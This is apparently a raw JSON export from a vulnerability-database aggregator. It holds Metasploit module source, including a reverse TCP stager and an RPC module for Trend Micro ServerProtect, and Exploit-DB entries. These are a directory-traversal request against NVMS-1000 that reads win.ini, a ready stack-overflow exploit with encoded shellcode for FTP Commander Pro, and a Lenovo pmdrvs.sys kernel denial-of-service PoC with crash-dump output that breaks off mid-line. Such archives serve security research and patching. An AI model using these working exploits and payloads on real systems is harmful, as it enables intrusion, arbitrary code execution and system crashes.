padding = \"\\0\" * (4 - (data.length.remainder(4)))\n else\n padding = \"\"\n end\n\n stub =\n NDR.long(cmd) +\n NDR.long(data.length) +\n data +\n padding +\n NDR.long(data.length) +\n NDR.long(osize)\n\n return serverprotect_rpc_call(0, stub)\n end\n\n #\n # Call the serverprotect RPC service\n #\n def serverprotect_rpc_call(opnum, data = '')\n\n begin\n\n connect\n\n handle = dcerpc_handle(\n '25288888-bd5b-11d1-9d53-0080c83a5c2c', '1.0',\n 'ncacn_ip_tcp', [datastore['RPORT']]\n )\n\n dcerpc_bind(handle)\n\n resp = dcerpc.call(opnum, data)\n outp = ''\n\n if (dcerpc.last_response and dcerpc.last_response.stub_data)\n outp = dcerpc.last_response.stub_data\n end\n\n disconnect\n\n outp\n\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error: #{e}\")\n nil\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-11-22T05:30:29", "differentElements": ["cvelist", "cvss", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 38}], "viewCount": 13, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-11-22T07:32:45"}, "dependencies": {"references": [{"type": "vulnerlab", "idList": ["VULNERLAB:2187"]}, {"type": "kitploit", "idList": ["KITPLOIT:2423308827989438502", "KITPLOIT:7044561031766565764"]}, {"type": "threatpost", "idList": ["THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:E00DA222DAC876747F9911778DDC997F", "THREATPOST:B9A717DA93642284A9408C7A11D5714E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A945F3BF130B3EBF81C9BAB217460EB7"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:06ED86BC5FE8565621F6AE9C50A76CB4"]}, {"type": "mskb", "idList": ["KB4474419", "KB4484127", "KB4484113", "KB4490628", "KB4484144"]}, {"type": "nessus", "idList": ["SOLR_8_2_0.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47702", "EDB-ID:47704"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155433", "PACKETSTORM:155428", "PACKETSTORM:155422"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:92BAA97414824FCFD7415368441F952B"]}], "modified": "2019-11-22T07:32:45"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/windows/reverse_tcp_rc4_dns'\n\nmodule MetasploitModule\n\n CachedSize = 425\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::ReverseTcpRc4Dns\n\n def self.handler_type_alias\n \"reverse_tcp_rc4_dns\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'sockedi',\n 'Stager' =>\n { 'RequiresMidstager' => false }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"]}
{"exploitdb": [{"lastseen": "2019-12-13T09:22:30", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "EDB-ID:47774", "href": "https://www.exploit-db.com/exploits/47774", "type": "exploitdb", "title": "NVMS 1000 - Directory Traversal", "sourceData": "# Title: NVMS-1000 - Directory Traversal\r\n# Date: 2019-12-12\r\n# Author: Numan T\u00fcrle\r\n# Vendor Homepage: http://en.tvt.net.cn/\r\n# Version : N/A\r\n# Software Link : http://en.tvt.net.cn/products/188.html\r\n\r\nPOC\r\n---------\r\n\r\nGET /../../../../../../../../../../../../windows/win.ini HTTP/1.1\r\nHost: 12.0.0.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7\r\nConnection: close\r\n\r\nResponse\r\n---------\r\n\r\n; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n[mci extensions]\r\n[files]\r\n[Mail]\r\nMAPI=1", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47774"}, {"lastseen": "2019-12-13T09:22:30", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-13T00:00:00", "published": "2019-12-13T00:00:00", "id": "EDB-ID:47775", "href": "https://www.exploit-db.com/exploits/47775", "type": "exploitdb", "title": "FTP Commander Pro 8.03 - Local Stack Overflow", "sourceData": "# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow \r\n# Date: 2019-12-12\r\n# Exploit Author: boku\r\n# Discovered by: UN_NON\r\n# Original DoS: FTP Commander 8.02 - Overwrite (SEH) \r\n# Original DoS Link: https://www.exploit-db.com/exploits/37810\r\n# Software Vendor: http://www.internet-soft.com/\r\n# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe\r\n# Version: Version 8.03 & Version 8.02 (same exploit for both)\r\n# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)\r\n# Windows 10 Education 1909 (32-bit; OS-build=18363.418)\r\n# Windows 10 Pro 1909 (32-bit; OS-build=18363.418)\r\n# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)\r\n# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600\r\n# Python Version: Python 2.7.16+\r\n\r\n# Recreate:\r\n# 1) Generate 'poc.txt' payload using python 2.7.x\r\n# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy\r\n# 3) Install & Open ftpCommander v8.03 (or v8.02)\r\n# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command\r\n# - A textbox will appear on the bottom of the right window\r\n# 5) Paste payload from generated txt file into textbox\r\n# 6) Click \"Do it\"\r\n# - The program will crash & calculator will open\r\n# Other Security Issue: \r\n# - The program's default install path is: C:\\\\cftp\\cftp.exe\r\n\r\n#!/usr/bin/python\r\n\r\nblt = '\\033[92m[\\033[0m+\\033[92m]\\033[0m ' # bash green success bullet\r\nerr = '\\033[91m[\\033[0m!\\033[91m]\\033[0m ' # bash red error bullet\r\n\r\ntry:\r\n # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH\r\n nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly\r\n # EIP jump lands at the beginning of the buffer\r\n # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode\r\n # msfvenom -p windows/exec CMD='calc' -b '\\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper\r\n #x86/alpha_upper succeeded with size 447 (iteration=0)\r\n shellcode = b\"\"\r\n shellcode += b\"\\x89\\xe7\\xda\\xd6\\xd9\\x77\\xf4\\x58\\x50\\x59\\x49\"\r\n shellcode += b\"\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\"\r\n shellcode += b\"\\x56\\x54\\x58\\x33\\x30\\x56\\x58\\x34\\x41\\x50\\x30\"\r\n shellcode += b\"\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42\\x41\"\r\n shellcode += b\"\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n shellcode += b\"\\x42\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\"\r\n shellcode += b\"\\x49\\x4b\\x4c\\x4a\\x48\\x4d\\x52\\x35\\x50\\x35\\x50\"\r\n shellcode += b\"\\x33\\x30\\x53\\x50\\x4c\\x49\\x4d\\x35\\x50\\x31\\x39\"\r\n shellcode += b\"\\x50\\x52\\x44\\x4c\\x4b\\x50\\x50\\x56\\x50\\x4c\\x4b\"\r\n shellcode += b\"\\x46\\x32\\x44\\x4c\\x4c\\x4b\\x31\\x42\\x42\\x34\\x4c\"\r\n shellcode += b\"\\x4b\\x42\\x52\\x46\\x48\\x34\\x4f\\x4f\\x47\\x51\\x5a\"\r\n shellcode += b\"\\x51\\x36\\x36\\x51\\x4b\\x4f\\x4e\\x4c\\x37\\x4c\\x33\"\r\n shellcode += b\"\\x51\\x33\\x4c\\x44\\x42\\x56\\x4c\\x57\\x50\\x4f\\x31\"\r\n shellcode += b\"\\x58\\x4f\\x54\\x4d\\x45\\x51\\x4f\\x37\\x5a\\x42\\x4b\"\r\n shellcode += b\"\\x42\\x36\\x32\\x30\\x57\\x4c\\x4b\\x51\\x42\\x34\\x50\"\r\n shellcode += b\"\\x4c\\x4b\\x50\\x4a\\x57\\x4c\\x4c\\x4b\\x30\\x4c\\x32\"\r\n shellcode += b\"\\x31\\x34\\x38\\x4b\\x53\\x57\\x38\\x43\\x31\\x4e\\x31\"\r\n shellcode += b\"\\x46\\x31\\x4c\\x4b\\x31\\x49\\x51\\x30\\x45\\x51\\x48\"\r\n shellcode += b\"\\x53\\x4c\\x4b\\x47\\x39\\x44\\x58\\x4b\\x53\\x37\\x4a\"\r\n shellcode += b\"\\x31\\x59\\x4c\\x4b\\x56\\x54\\x4c\\x4b\\x35\\x51\\x4e\"\r\n shellcode += b\"\\x36\\x50\\x31\\x4b\\x4f\\x4e\\x4c\\x39\\x51\\x38\\x4f\"\r\n shellcode += b\"\\x34\\x4d\\x45\\x51\\x59\\x57\\x30\\x38\\x4b\\x50\\x43\"\r\n shellcode += b\"\\x45\\x5a\\x56\\x55\\x53\\x33\\x4d\\x4a\\x58\\x57\\x4b\"\r\n shellcode += b\"\\x53\\x4d\\x31\\x34\\x54\\x35\\x4a\\x44\\x36\\x38\\x4c\"\r\n shellcode += b\"\\x4b\\x31\\x48\\x36\\x44\\x45\\x51\\x38\\x53\\x35\\x36\"\r\n shellcode += b\"\\x4c\\x4b\\x44\\x4c\\x30\\x4b\\x4c\\x4b\\x30\\x58\\x35\"\r\n shellcode += b\"\\x4c\\x53\\x31\\x49\\x43\\x4c\\x4b\\x44\\x44\\x4c\\x4b\"\r\n shellcode += b\"\\x55\\x51\\x38\\x50\\x4d\\x59\\x47\\x34\\x31\\x34\\x56\"\r\n shellcode += b\"\\x44\\x51\\x4b\\x51\\x4b\\x55\\x31\\x46\\x39\\x31\\x4a\"\r\n shellcode += b\"\\x30\\x51\\x4b\\x4f\\x4d\\x30\\x31\\x4f\\x31\\x4f\\x50\"\r\n shellcode += b\"\\x5a\\x4c\\x4b\\x42\\x32\\x4a\\x4b\\x4c\\x4d\\x31\\x4d\"\r\n shellcode += b\"\\x53\\x5a\\x33\\x31\\x4c\\x4d\\x4b\\x35\\x48\\x32\\x33\"\r\n shellcode += b\"\\x30\\x55\\x50\\x33\\x30\\x56\\x30\\x32\\x48\\x30\\x31\"\r\n shellcode += b\"\\x4c\\x4b\\x42\\x4f\\x4d\\x57\\x4b\\x4f\\x38\\x55\\x4f\"\r\n shellcode += b\"\\x4b\\x4c\\x30\\x4f\\x45\\x59\\x32\\x56\\x36\\x55\\x38\"\r\n shellcode += b\"\\x59\\x36\\x5a\\x35\\x4f\\x4d\\x4d\\x4d\\x4b\\x4f\\x59\"\r\n shellcode += b\"\\x45\\x37\\x4c\\x54\\x46\\x43\\x4c\\x54\\x4a\\x4d\\x50\"\r\n shellcode += b\"\\x4b\\x4b\\x4b\\x50\\x34\\x35\\x33\\x35\\x4f\\x4b\\x51\"\r\n shellcode += b\"\\x57\\x32\\x33\\x53\\x42\\x52\\x4f\\x42\\x4a\\x35\\x50\"\r\n shellcode += b\"\\x50\\x53\\x4b\\x4f\\x39\\x45\\x42\\x43\\x53\\x51\\x42\"\r\n shellcode += b\"\\x4c\\x32\\x43\\x53\\x30\\x41\\x41\"\r\n # Fill the rest of the space with B's until we are at our EIP offset\r\n offset = '\\x42'*(4108-len(nops+shellcode))\r\n # The EAX register holds a Pointer to the beginning of our buffer\r\n # FF20 = jmp [eax]\r\n # !mona find -o -s '\\xFF\\x20' \r\n # 0x0041081a : '\\xFF\\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe] \r\n # | ASLR: False; Rebase: False; SafeSEH: False; \r\n eip = '\\x1a\\x08\\x41' # 3 byte overwrite so we can set EIP to start with 0x00\r\n # After jmp [eax], we land at the beginning of our buffer\r\n payload = nops+shellcode+offset+eip\r\n File = 'poc.txt'\r\n f = open(File, 'w') # open file for write\r\n f.write(payload)\r\n f.close() # close the file\r\n print blt + File + \" created successfully \"\r\n\r\nexcept:\r\n print err + File + ' failed to create'", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/47775"}, {"lastseen": "2019-12-12T11:23:11", "bulletinFamily": "exploit", "description": "", "modified": "2019-12-12T00:00:00", "published": "2019-12-12T00:00:00", "id": "EDB-ID:47771", "href": "https://www.exploit-db.com/exploits/47771", "type": "exploitdb", "title": "Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)", "sourceData": "# Exploit Title: Lenovo Power Management Driver 1.67.17.48 - 'pmdrvs.sys' Denial of Service (PoC)\r\n# Date: 2019-12-11\r\n# Exploit Author: Nassim Asrir\r\n# CVE: CVE-2019-6192\r\n# Tested On: Windows 10(64bit) | ThinkPad T470p\r\n# Vendor : https://www.lenovo.com/us/en/\r\n# Ref : https://support.lenovo.com/us/fr/solutions/len-29334\r\n\r\n# Description\r\n# A vulnerability in pmdrvs.sys driver has been discovered in Lenovo Power Management Driver\r\n# The vulnerability exists due to insuffiecient input buffer validation when the driver processes IOCTL codes\r\n# Attackers can exploit this issue to cause a Denial of Service or possibly execute arbitrary code in kernel space.\r\n\r\n# Exploit\r\n\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <conio.h>\r\n\r\nint main(int argc, char **argv)\r\n{\r\n HANDLE hDevice;\r\n DWORD bret;\r\n char szDevice[] = \"\\\\\\\\.\\\\pmdrvs\";\r\n\r\n printf(\"--[ Lenovo Power Management Driver pmdrvs.sys Denial Of Service ]--\\n\");\r\n\r\n printf(\"Opening handle to driver..\\n\");\r\n \r\n if ((hDevice = CreateFileA(szDevice, GENERIC_READ | GENERIC_WRITE,0,0,OPEN_EXISTING,0,NULL)) != INVALID_HANDLE_VALUE) {\r\n printf(\"Device %s succesfully opened!\\n\", szDevice);\r\n printf(\"\\tHandle: %p\\n\", hDevice);\r\n }\r\n else\r\n {\r\n printf(\"Error: Error opening device %s\\n\", szDevice);\r\n }\r\n\r\n printf(\"\\nPress any key to DoS..\");\r\n _getch();\r\n\r\n bret = 0;\r\n \r\n if (!DeviceIoControl(hDevice, 0x80862013, (LPVOID)0xdeadbeef, 0x0, (LPVOID)0xdeadbeef, 0x0, &bret, NULL))\r\n {\r\n printf(\"DeviceIoControl Error - bytes returned %#x\\n\", bret);\r\n }\r\n\r\n CloseHandle(hDevice);\r\n return 0;\r\n}\r\n\r\n\r\n# RCA\r\n\r\n2: kd> !analyze -v\r\n*******************************************************************************\r\n* *\r\n* Bugcheck Analysis *\r\n* *\r\n*******************************************************************************\r\n\r\nSYSTEM_SERVICE_EXCEPTION (3b)\r\nAn exception happened while executing a system service routine.\r\nArguments:\r\nArg1: 00000000c0000005, Exception code that caused the bugcheck\r\nArg2: fffff80428bf109d, Address of the instruction which caused the bugcheck\r\nArg3: ffffc709dee8ec50, Address of the context record for the exception that caused the bugcheck\r\nArg4: 0000000000000000, zero.\r\n\r\nFAULTING_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nCONTEXT: ffffc709dee8ec50 -- (.cxr 0xffffc709dee8ec50)\r\nrax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8\r\nrdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290\r\n r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020\r\nr11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=????????\r\nResetting default scope\r\n\r\nCPU_COUNT: 8\r\n\r\nCPU_MHZ: af8\r\n\r\nCPU_VENDOR: GenuineIntel\r\n\r\nCPU_FAMILY: 6\r\n\r\nCPU_MODEL: 9e\r\n\r\nCPU_STEPPING: 9\r\n\r\nCPU_MICROCODE: 0,0,0,0 (F,M,S,R) SIG: 8E'00000000 (cache) 0'00000000 (init)\r\n\r\nBLACKBOXBSD: 1 (!blackboxbsd)\r\n\r\n\r\nBLACKBOXPNP: 1 (!blackboxpnp)\r\n\r\n\r\nCURRENT_IRQL: 0\r\n\r\nANALYSIS_SESSION_HOST: LAPTOP-SP\r\n\r\nANALYSIS_SESSION_TIME: 09-30-2019 20:29:54.0485\r\n\r\nANALYSIS_VERSION: 10.0.17763.132 amd64fre\r\n\r\nLAST_CONTROL_TRANSFER: from fffff80428bf5060 to fffff80428bf109d\r\n\r\nSTACK_TEXT: \r\nffffc709`dee8f640 fffff804`28bf5060 : 00000000`00000000 ffff9980`05b00099 00000000`00000000 00000000`00000000 : pmdrvs+0x109d\r\nffffc709`dee8f6c0 fffff804`1f12dba9 : ffffca04`ca8f80a0 fffff804`1f6d6224 ffffca04`cc51ff20 00000000`00000000 : pmdrvs+0x5060\r\nffffc709`dee8f6f0 fffff804`1f6abb11 : ffffc709`dee8fa80 ffffca04`ca8f80a0 00000000`00000001 ffffca04`cc188290 : nt!IofCallDriver+0x59\r\nffffc709`dee8f730 fffff804`1f6d763c : ffffca04`00000000 ffffca04`cc188290 ffffc709`dee8fa80 ffffc709`dee8fa80 : nt!NtQueryInformationFile+0x1071\r\nffffc709`dee8f7e0 fffff804`1f64c356 : 00007fff`2fd66712 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtClose+0xffc\r\nffffc709`dee8f920 fffff804`1f27a305 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtDeviceIoControlFile+0x56\r\nffffc709`dee8f990 00007fff`33aaf844 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!setjmpex+0x7925\r\n00000000`0068fcf8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007fff`33aaf844\r\n\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC: fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68\r\n\r\nTHREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb\r\n\r\nTHREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b\r\n\r\nFOLLOWUP_IP:\r\npmdrvs+109d\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\n\r\nFAULT_INSTR_CODE: 8941078b\r\n\r\nSYMBOL_STACK_INDEX: 0\r\n\r\nFOLLOWUP_NAME: MachineOwner\r\n\r\nSTACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb\r\n\r\nBUGCHECK_STR: 2E8B5A19\r\n\r\nEXCEPTION_CODE_STR: 2E8B5A19\r\n\r\nEXCEPTION_STR: WRONG_SYMBOLS\r\n\r\nPROCESS_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nIMAGE_NAME: ntoskrnl.wrong.symbols.exe\r\n\r\nMODULE_NAME: nt_wrong_symbols\r\n\r\nSYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000\r\n\r\nBUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nDEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145\r\n\r\nPRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS\r\n\r\nFAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000\r\n\r\nTARGET_TIME: 2019-09-30T19:27:36.000Z\r\n\r\nOSBUILD: 17763\r\n\r\nOSSERVICEPACK: 0\r\n\r\nSERVICEPACK_NUMBER: 0\r\n\r\nOS_REVISION: 0\r\n\r\nSUITE_MASK: 272\r\n\r\nPRODUCT_TYPE: 1\r\n\r\nOSPLATFORM_TYPE: x64\r\n\r\nOSNAME: Windows 10\r\n\r\nOSEDITION: Windows 10 WinNt TerminalServer SingleUserTS\r\n\r\nOS_LOCALE: \r\n\r\nUSER_LCID: 0\r\n\r\nOSBUILD_TIMESTAMP: 1994-09-30 01:21:45\r\n\r\nBUILDDATESTAMP_STR: 180914-1434\r\n\r\nBUILDLAB_STR: rs5_release\r\n\r\nBUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434\r\n\r\nANALYSIS_SESSION_ELAPSED_TIME: ae\r\n\r\nANALYSIS_SOURCE: KM\r\n\r\nFAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000\r\n\r\nFAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1}\r\n\r\nFollowup: MachineOwner\r\n---------\r\n\r\n2: kd> u fffff804`28bf109d\r\npmdrvs+0x109d:\r\nfffff804`28bf109d 8b07 mov eax,dword ptr [rdi]\r\nfffff804`28bf109f 41894308 mov dword ptr [r11+8],eax\r\nfffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000)\r\nfffff804`28bf10a8 85c0 test eax,eax\r\nfffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132)\r\nfffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h]\r\nfffff804`28bf10b8 4885c9 test rcx,rcx\r\nfffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132)\r\n2: kd> !for_each_frame .frame /r @$Frame\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\n00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!KeBugCheckEx:\r\nfffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\n01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7f09:\r\nfffff804`1f27a8e9 90 nop\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\n02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x735c:\r\nfffff804`1f279d3c b801000000 mov eax,1\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\n03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!_chkstk+0x41f:\r\nfffff804`1f271b4f 0f1f00 nop dword ptr [rax]\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\n04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000\r\nrip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510\r\nr14=0000000000000000 r15=ffffc709dee8f408\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!RtlUnwindEx+0x3440:\r\nfffff804`1f1ca460 8bd0 mov edx,eax\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\n05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264\r\nrax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000\r\nrip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40\r\nr14=ffffc709dee8f4b0 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!ExReleaseAutoExpandPushLockExclusive+0x264:\r\nfffff804`1f0d7c24 84c0 test al,al\r\n_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\n06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2\r\nrax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b\r\nrdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000\r\nrip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530\r\n r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000\r\nr11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40\r\nr14=0000000000000002 r15=0000000000000000\r\niopl=0 nv up ei ng nz na pe nc\r\ncs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282\r\nnt!setjmpex+0x7fe2:\r\nfffff804`1f27a9c2 488d8c2400010000 lea 